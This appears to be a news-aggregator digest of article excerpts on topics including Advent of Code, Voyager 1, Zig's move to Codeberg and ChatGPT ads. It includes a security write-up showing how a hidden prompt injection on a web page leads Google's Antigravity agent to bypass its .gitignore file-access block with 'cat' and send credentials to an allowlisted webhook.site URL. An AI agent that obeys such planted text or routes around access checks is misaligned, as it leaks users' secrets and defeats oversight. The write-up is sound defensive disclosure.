10 interesting stories served every morning and every evening.
Hi! I’m Eric Wastl. I make Advent of Code. I hope you like it! I also make lots of other things. I’m on Bluesky, Mastodon, and GitHub.
Advent of Code is an Advent calendar of small programming puzzles for a variety of skill levels that can be solved in any programming language you like. People use them as interview prep, company training, university coursework, practice problems, a speed contest, or to challenge each other.
You don’t need a computer science background to participate - just a little programming knowledge and some problem solving skills will get you pretty far. Nor do you need a fancy computer; every problem has a solution that completes in at most 15 seconds on ten-year-old hardware.
If you’d like to support Advent of Code, you can do so indirectly by helping to share it with others or directly via AoC++.
If you get stuck, try your solution against the examples given in the puzzle; you should get the same answers. If not, re-read the description. Did you misunderstand something? Is your program doing something you don’t expect? After the examples work, if your answer still isn’t correct, build some test cases for which you can verify the answer by hand and see if those work with your program. Make sure you have the entire puzzle input. If you’re still stuck, maybe ask a friend for help, or come back to the puzzle later. You can also ask for hints in the subreddit.
Is there an easy way to select entire code blocks? You should be able to triple-click code blocks to select them. You’ll need JavaScript enabled.
#!/usr/bin/env perl
use warnings;
use strict;
print "You can test it out by ";
print "triple-clicking this code.\n";
How does authentication work? Advent of Code uses OAuth to confirm your identity through other services. When you log in, you only ever give your credentials to that service - never to Advent of Code. Then, the service you use tells the Advent of Code servers that you’re really you. In general, this reveals no information about you beyond what is already public; here are examples from Reddit and GitHub. Advent of Code will remember your unique ID, names, URL, and image from the service you use to authenticate.
Why was this puzzle so easy / hard? The difficulty and subject matter varies throughout each event. Very generally, the puzzles get more difficult over time, but your specific skillset will make each puzzle significantly easier or harder for you than someone else. Making puzzles is tricky.
Why do the puzzles unlock at midnight EST/UTC-5? Because that’s when I can consistently be available to make sure everything is working. I also have a family, a day job, and even need sleep occasionally. If you can’t participate at midnight, that’s not a problem; if you want to race, many people use private leaderboards to compete with people in their area.
I find the text on the site hard to read. Is there a high contrast mode? There is a high contrast alternate stylesheet. Firefox supports these by default (View -> Page Style -> High Contrast).
I have a puzzle idea! Can I send it to you? Please don’t. Because of legal issues like copyright and attribution, I don’t accept puzzle ideas, and I won’t even read your email if it looks like one just in case I use parts of it by accident.
Did I find a bug with a puzzle? Once a puzzle has been out for even an hour, many people have already solved it; after that point, bugs are very unlikely. Start by asking on the subreddit.
Should I try to get a fast solution time? Maybe. Solving puzzles is hard enough on its own, but trying for a fast time also requires many additional skills and a lot of practice; speed-solves often look nothing like code that would pass a code review. If that sounds interesting, go for it! However, you should do Advent of Code in a way that is useful to you, and so it is completely fine to choose an approach that meets your goals and ignore speed entirely.
Why did the number of days per event change? It takes a ton of my free time every year to run Advent of Code, and building the puzzles accounts for the majority of that time. After keeping a consistent schedule for ten years(!), I needed a change. The puzzles still start on December 1st so that the day numbers make sense (Day 1 = Dec 1), and puzzles come out every day (ending mid-December).
What happened to the global leaderboard? The global leaderboard was one of the largest sources of stress for me, for the infrastructure, and for many users. People took things too seriously, going way outside the spirit of the contest; some people even resorted to things like DDoS attacks. Many people incorrectly concluded that they were somehow worse programmers because their own times didn’t compare. What started as a fun feature in 2015 became an ever-growing problem, and so, after ten years of Advent of Code, I removed the global leaderboard. (However, I’ve made it so you can share a read-only view of your private leaderboard. Please don’t use this feature or data to create a “new” global leaderboard.)
While trying to get a fast time on a private leaderboard, may I use AI / watch streamers / check the solution threads / ask a friend for help / etc? If you are a member of any private leaderboards, you should ask the people that run them what their expectations are of their members. If you don’t agree with those expectations, you should find a new private leaderboard or start your own! Private leaderboards might have rules like maximum runtime, allowed programming language, what time you can first open the puzzle, what tools you can use, or whether you have to wear a silly hat while working.
Should I use AI to solve Advent of Code puzzles? No. If you send a friend to the gym on your behalf, would you expect to get stronger? Advent of Code puzzles are designed to be interesting for humans to solve - no consideration is made for whether AI can or cannot solve a puzzle. If you want practice prompting an AI, there are almost certainly better exercises elsewhere designed with that in mind.
Can I copy/redistribute part of Advent of Code? Please don’t. Advent of Code is free to use, not free to copy. If you’re posting a code repository somewhere, please don’t include parts of Advent of Code like the puzzle text or your inputs. If you’re making a website, please don’t make it look like Advent of Code or name it something similar.
...
Read the original on adventofcode.com »
Voyager 1 Is About to Reach One Light-day from Earth
Artist’s concept of the Voyager 1 spacecraft speeding through interstellar space. (Image: NASA / JPL‑Caltech)
After nearly 50 years in space, NASA’s Voyager 1 is about to hit a historic milestone. By November 15, 2026, it will be 16.1 billion miles (25.9 billion km) away, meaning a radio signal will take a full 24 hours, one light-day, to reach it. For context, a light-year is the distance light travels in a year, about 5.88 trillion miles (9.46 trillion km), so one light-day is just a tiny fraction of that.
Launched in 1977 to explore Jupiter and Saturn, Voyager 1 entered interstellar space in 2012, becoming the most distant human-made object ever. Traveling at around 11 miles per second (17.7 km/s), it adds roughly 3.5 astronomical units (one astronomical unit is the distance from Earth to the Sun) to its distance each year. Even after decades in the harsh environment of space, Voyager 1 keeps sending data thanks to its radioisotope thermoelectric generators, which will last into the 2030s.
Communicating with Voyager 1 is slow. Commands now take about a day to arrive, with another day for confirmation. Compare that to the Moon (1.3 seconds), Mars (up to 4 minutes), and Pluto (nearly 7 hours). The probe’s distance makes every instruction a patient exercise in deep-space operations. To reach our closest star, Proxima Centauri, even at light speed, would take over four years—showing just how tiny a light-day is in cosmic terms.
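The delays in the paragraph above are just distance divided by the speed of light; a quick sketch (figures taken from the article, rounded):

```python
# One-way light delay = distance / speed of light.
C_KM_S = 299_792.458  # speed of light in km/s

def light_delay_hours(distance_km: float) -> float:
    """One-way signal travel time in hours."""
    return distance_km / C_KM_S / 3600.0

# Voyager 1 at ~25.9 billion km (the article's November 2026 figure):
print(round(light_delay_hours(25.9e9), 1))           # ~24.0 hours
# The Moon, ~384,400 km away, for comparison:
print(round(light_delay_hours(384_400) * 3600, 1))   # ~1.3 seconds
```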
The ‘Pale Blue Dot’ image of Earth, captured by Voyager 1. (Image: NASA / Public Domain)
Voyager 1’s journey is more than a record for distance. From its planetary flybys to the iconic ‘Pale Blue Dot’ image, it reminds us of the vast scale of the solar system and the incredible endurance of a spacecraft designed to keep exploring, even without return.
...
Read the original on scienceclock.com »
In my recent analysis of YouTube’s information density I included the results from an advanced statistical analysis on the number of videos present on the home page, which projected that around May 2026 there would only be one lonely video on the home screen.
Amazingly, a disgruntled Googler leaked a recording of how YouTube’s PM
org handled the criticism as it sat at the
top of Hacker News for a whole day for some reason.
The net result is that after months of hard work by YouTube engineers, the other day I fired up YouTube on an Apple TV and was graced with this:
Let’s analyze this picture and count the number of videos on the home screen:
Unfortunately the YouTube PM org’s myopia is accelerating: with this data I now project that there will be zero videos on the home screen around May of 2026, moved up from September.
Apparently Poe’s Law applies to Google PMs, satire is dead, and maybe our mandatory NeuraLinks are coming sooner than I thought.
...
Read the original on jayd.ml »
Ever since git init ten years ago, Zig has been hosted on GitHub. Unfortunately, when it sold out to Microsoft, the clock started ticking. “Please just give me 5 years before everything goes to shit,” I thought to myself. And here we are, 7 years later, living on borrowed time.
Putting aside GitHub’s relationship with ICE, it’s abundantly clear that the engineering excellence that created GitHub’s success is no longer driving it. Priorities and the engineering culture have rotted, leaving users inflicted with some kind of bloated, buggy JavaScript framework in the name of progress. Stuff that used to be snappy is now sluggish and often entirely broken.
Most importantly, Actions has inexcusable bugs while being completely neglected. After the CEO of GitHub said to “embrace AI or get out”, it seems the lackeys at Microsoft took the hint, because GitHub Actions started “vibe-scheduling”: choosing jobs to run seemingly at random. Combined with other bugs and the inability to manually intervene, this causes our CI system to get so backed up that not even master branch commits get checked.
Rather than wasting donation money on more CI hardware to work around this crumbling infrastructure, we’ve opted to switch Git hosting providers instead.
As a bonus, we look forward to fewer violations (exhibit A, B, C) of our strict no LLM / no AI policy, which I believe are at least in part due to GitHub aggressively pushing the “file an issue with Copilot” feature in everyone’s face.
The only concern we have in leaving GitHub behind has to do with GitHub Sponsors. This product was key to Zig’s early fundraising success, and it remains a large portion of our revenue today. I can’t thank Devon Zuegel enough. She appeared like an angel from heaven and single-handedly made GitHub into a viable source of income for thousands of developers. Under her leadership, the future of GitHub Sponsors looked bright, but sadly for us, she, too, moved on to bigger and better things. Since she left, that product as well has been neglected and is already starting to decline.
Although GitHub Sponsors is a large fraction of Zig Software Foundation’s donation income, we consider it a liability. We humbly ask if you, reader, are currently donating through GitHub Sponsors, that you consider moving your recurring donation to Every.org, which is itself a non-profit organization.
As part of this, we are sunsetting the GitHub Sponsors perks. These perks are things like getting your name onto the home page, and getting your name into the release notes, based on how much you donate monthly. We are working with the folks at Every.org so that we can offer the equivalent perks through that platform.
Effective immediately, I have made ziglang/zig on GitHub read-only, and the canonical origin/master branch of the main Zig project repository is https://codeberg.org/ziglang/zig.git.
Thank you to the Forgejo contributors who helped us with our issues switching to the platform, as well as the Codeberg folks who worked with us on the migration - in particular Earl Warren, Otto, Gusted, and Mathieu Fenniak.
In the end, we opted for a simple strategy, sidestepping GitHub’s aggressive vendor lock-in: leave the existing issues open and unmigrated, but start counting issues at 30000 on Codeberg so that all issue numbers remain unambiguous. Let us please consider the GitHub issues that remain open as metaphorically “copy-on-write”. Please leave all your existing GitHub issues and pull requests alone. No need to move your stuff over to Codeberg unless you need to make edits, additional comments, or rebase. We’re still going to look at the already open pull requests and issues; don’t worry.
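The offset scheme amounts to a simple partition of the issue-number space: anything below 30000 lives on the read-only GitHub tracker, anything at or above it on Codeberg. A hypothetical helper illustrating the idea (the function and constant names are mine, not the Zig project’s):

```python
GITHUB_REPO = "https://github.com/ziglang/zig"      # read-only archive
CODEBERG_REPO = "https://codeberg.org/ziglang/zig"  # canonical home
ISSUE_OFFSET = 30000  # Codeberg numbering starts here, per the migration plan

def issue_url(number: int) -> str:
    """Map an unambiguous issue number to the tracker that owns it."""
    repo = CODEBERG_REPO if number >= ISSUE_OFFSET else GITHUB_REPO
    return f"{repo}/issues/{number}"

print(issue_url(12345))  # an old GitHub issue
print(issue_url(30001))  # a new Codeberg issue
```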
In this modern era of acquisitions, weak antitrust regulations, and platform capitalism leading to extreme concentrations of wealth, non-profits remain a bastion defending what remains of the commons.
...
Read the original on ziglang.org »
How to Get to Zero at Pioneer Works, Sep 12 - Dec 14, 2025. Review in the Art Newspaper, Oct 14. Offset at MediaLive: Data Rich, Dirt Poor at BMoCA, Sep 12 - Jan 11, 2026.
A browser extension for avoiding AI slop.
Download it for Chrome or Firefox.
This is a search tool that will only return content created before ChatGPT’s first public release on November 30, 2022.
Since the public release of ChatGPT and other large language models, the internet has been increasingly polluted by AI-generated text, images, and video. This browser extension uses the Google search API to return only content published before Nov 30th, 2022, so you can be sure that it was written or produced by human hands.
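Google’s Programmable Search JSON API exposes a date-range restrict (`sort=date:r:YYYYMMDD:YYYYMMDD`), which is one way such a cutoff could be implemented. A sketch, assuming this is roughly how the filter works rather than quoting the extension’s source; the API key and engine ID are placeholders:

```python
import urllib.parse

CUTOFF = "20221129"  # the day before ChatGPT's public release

def pre_ai_search_url(query: str, api_key: str, engine_id: str) -> str:
    """Build a Custom Search request restricted to pre-ChatGPT content."""
    params = {
        "key": api_key,       # placeholder credential
        "cx": engine_id,      # placeholder search engine ID
        "q": query,
        "sort": f"date:r:19900101:{CUTOFF}",  # inclusive date range
    }
    return "https://www.googleapis.com/customsearch/v1?" + urllib.parse.urlencode(params)

print(pre_ai_search_url("bread recipe", "KEY", "ENGINE"))
```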
...
Read the original on tegabrain.com »
I’m done. I’m done arriving at hotels and discovering that they have removed the bathroom door. Something that should be as standard as having a bed, has been sacrificed in the name of “aesthetic”.
I get it, you can save on material costs and make the room feel bigger, but what about my dignity??? I can’t save that when you don’t include a bathroom door.
It’s why I’ve built this website, where I compiled hotels that are guaranteed to have bathroom doors, and hotels that need to work on privacy.
I’ve emailed hundreds of hotels and I asked them two things: do your doors close all the way, and are they made of glass? Everyone that says yes to their doors closing, and no to being made of glass has been sorted by price range and city for you to easily find places to stay that are guaranteed to have a bathroom door.
Quickly check to see if the hotel you’re thinking of booking has been reported as lacking in doors by a previous guest.
Finally, this passion project could not exist without people submitting hotels without bathroom doors for public shaming. If you’ve stayed at a doorless hotel send me an email with the hotel name to bringbackdoors@gmail.com, or send me a DM on Instagram with the hotel name and a photo of the doorless setup to be publicly posted.
Let’s name and shame these hotels to protect the dignity of future travelers.
...
Read the original on bringbackdoors.com »
An indirect prompt injection in an implementation blog can manipulate Antigravity to invoke a malicious browser subagent in order to steal credentials and sensitive code from a user’s IDE.
Antigravity is Google’s new agentic code editor. In this article, we demonstrate how an indirect prompt injection can manipulate Gemini to invoke a malicious browser subagent in order to steal credentials and sensitive code from a user’s IDE.
Google’s approach is to include a disclaimer about the existing risks, which we address later in the article.
Let’s consider a use case in which a user would like to integrate Oracle ERP’s new Payer AI Agents into their application, and is going to use Antigravity to do so.
In this attack chain, we illustrate that a poisoned web source (an integration guide) can manipulate Gemini into (a) collecting sensitive credentials and code from the user’s workspace, and (b) exfiltrating that data by using a browser subagent to browse to a malicious site.
Note: Gemini is not supposed to have access to .env files in this scenario (with the default setting ‘Allow Gitignore Access > Off’). However, we show that Gemini bypasses its own setting to get access and subsequently exfiltrate that data.
The user provides Gemini with a reference implementation guide they found online for integrating Oracle ERP’s new AI Payer Agents feature.
Antigravity opens the referenced site and encounters the attacker’s prompt injection hidden in 1 point font.
a. Collect code snippets and credentials from the user’s codebase.
b. Create a dangerous URL using a domain that allows an attacker to capture network traffic logs and append credentials and code snippets to the request.
c. Activate a browser subagent to access the malicious URL, thus exfiltrating the data.
Gemini is manipulated by the attacker’s injection to exfiltrate confidential .env variables.
a. Gemini reads the prompt injection: Gemini ingests the prompt injection and is manipulated into believing that it must collect and submit data to a fictitious ‘tool’ to help the user understand the Oracle ERP integration.
b. Gemini gathers data to exfiltrate: Gemini begins to gather context to send to the fictitious tool. It reads the codebase and then attempts to access credentials stored in the .env file as per the attacker’s instructions.
c. Gemini bypasses the .gitignore file access protections: The user has followed a common practice of storing credentials in a .env file, and has the .env file listed in their .gitignore file. With the default configuration for Agent Gitignore Access, Gemini is prevented from reading the credential file.
This doesn’t stop Gemini. Gemini decides to work around this protection using the ‘cat’ terminal command to dump the file contents instead of using its built-in file reading capability that has been blocked.
d. Gemini constructs a URL with the user’s credentials and an attacker-monitored domain: Gemini builds a malicious URL per the prompt injection’s instructions by URL encoding the credentials and codebase snippets (e.g., replacing characters like spaces that would make a URL invalid), and appending it to a webhook.site domain that is monitored by the attacker.
e. Gemini exfiltrates the data via the browser subagent: Gemini invokes a browser subagent per the prompt injection, instructing the subagent to open the dangerous URL that contains the user’s credentials.
This step requires that the user has set up the browser tools feature. This is one of the flagship features of Antigravity, allowing Gemini to iterate on its designs by opening the application it is building in the browser.
Note: This attack chain showcases manipulation of the new Browser tools, but we found three additional data exfiltration vulnerabilities that did not rely on the Browser tools being enabled.
When Gemini creates a subagent instructed to browse to the malicious URL, the user may expect to be protected by the Browser URL Allowlist.
However, the default Allowlist provided with Antigravity includes ‘webhook.site’. Webhook.site allows anyone to create a URL where they can monitor requests to the URL.
So, the subagent completes the task.
3. When the malicious URL is opened by the browser subagent, the credentials and code stored in the URL are logged to the webhook.site address controlled by the attacker. Now, the attacker can read the credentials and code.
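The URL-construction step described above is plain percent-encoding from the standard library; a benign illustration with obviously fake values (the domain is a placeholder, not the attacker’s actual endpoint):

```python
from urllib.parse import quote

# Percent-encoding replaces characters (newlines, '=', spaces) that
# would otherwise make the query string invalid.
fake_env = "API_KEY=not-a-real-secret\nDB_PASS=example"
encoded = quote(fake_env)
exfil_url = f"https://webhook.example/log?data={encoded}"
print(exfil_url)
```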
During Antigravity’s onboarding, the user is prompted to accept the default recommended settings shown below.
These are the settings that, amongst other things, control when Gemini requests human approval. During the course of this attack demonstration, we clicked “next”, accepting these default settings.
This configuration allows Gemini to determine when it is necessary to request a human review for Gemini’s plans.
This configuration allows Gemini to determine when it is necessary to request a human review for commands Gemini will execute.
One might note that users operating Antigravity have the option to watch the chat as agents work, and could plausibly identify the malicious activity and stop it.
However, a key aspect of Antigravity is the ‘Agent Manager’ interface. This interface allows users to run multiple agents simultaneously and check in on the different agents at their leisure.
Under this model, it is expected that the majority of agents running at any given time will be running in the background without the user’s direct attention. This makes it highly plausible that an agent is not caught and stopped before it performs a malicious action as a result of encountering a prompt injection.
A lot of AI companies are opting for this disclaimer rather than mitigating the core issues. Here is the warning users are shown when they first open Antigravity:
Given that (1) the Agent Manager is a star feature allowing multiple agents to run at once without active supervision and (2) the recommended human-in-the-loop settings allow the agent to choose when to bring a human in to review commands, we find it extremely implausible that users will review every agent action and abstain from operating on sensitive data. Nevertheless, as Google has indicated that they are already aware of data exfiltration risks exemplified by our research, we did not undertake responsible disclosure.
...
Read the original on www.promptarmor.com »
More than a decade ago, when I was applying to graduate school, I went through a period of deep uncertainty. I had tried the previous year and hadn’t gotten in anywhere. I wanted to try again, but I had a lot going against me.
I’d spent most of my undergrad building a student job-portal startup and hadn’t balanced it well with academics. My GPA needed explaining. My GMAT score was just okay. I didn’t come from a big-brand employer. And there was no shortage of people with similar or stronger profiles applying to the same schools.
Even though I had learned a few things from the first round, the second attempt was still difficult. There were multiple points after I submitted applications where I lost hope.
But during that stretch, a friend and colleague kept repeating one line to me:
“All it takes is for one to work out.”
He’d say it every time I spiraled. And as much as it made me smile, a big part of me didn’t fully believe it. Still, it became a little maxim between us. And eventually, he was right — that one did work out. And it changed my life.
I’ve thought about that framing so many times since then.
You don’t need every job to choose you. You just need the one that’s the right fit.
You don’t need every house to accept your offer. You just need the one that feels like home.
You don’t need every person to want to build a life with you. You just need the one.
You don’t need ten universities to say yes. You just need the one that opens the right door.
These processes — college admissions, job searches, home buying, finding a partner — can be emotionally brutal. They can get you down in ways that feel personal. But in those moments, that truth can be grounding.
All it takes is for one to work out.
And that one is all you need.
...
Read the original on alearningaday.blog »
OpenAI is now internally testing ‘ads’ inside ChatGPT that could redefine the web economy.
Up until now, the ChatGPT experience has been completely free.
While there are premium plans and models, you don’t see GPT sell you products or show ads. On the other hand, Google Search has ads that influence your buying behaviour.
As spotted by Tibor on X, ChatGPT Android app 1.2025.329 beta includes new references to an “ads feature” with “bazaar content”, “search ad” and “search ads carousel.”
This move could disrupt the web economy, as what most people don’t understand is that GPT likely knows more about users than Google.
For example, OpenAI could create personalised ads on ChatGPT that promote products you really want to buy. It might also slip ads into search results, similar to Google Search ads.
The leak suggests that ads will initially be limited to the search experience only, but this may change in the future.
ChatGPT has roughly 800 million people using it every week, up from 100 million weekly users in November 2023 and about 300 million weekly users in late 2024.
An OpenAI-backed study estimated 700 million users sending 18 billion messages per week by July 2025, which lines up with this growth, and other analysts now peg traffic at around 5–6 billion visits per month.
GPT handles about 2.5 billion prompts a day, and India has become the single biggest user base, ahead of the US.
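Those figures are roughly self-consistent, which a quick arithmetic check confirms (all numbers are the article’s approximations):

```python
prompts_per_day = 2.5e9          # daily prompt volume
weekly_messages = prompts_per_day * 7
weekly_users = 700e6             # the study's mid-2025 estimate

print(weekly_messages / 1e9)           # 17.5 billion, close to the study's 18 billion
print(weekly_messages / weekly_users)  # 25 messages per user per week
```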
ChatGPT has everything it needs for ads to succeed. What do you think?
...
Read the original on www.bleepingcomputer.com »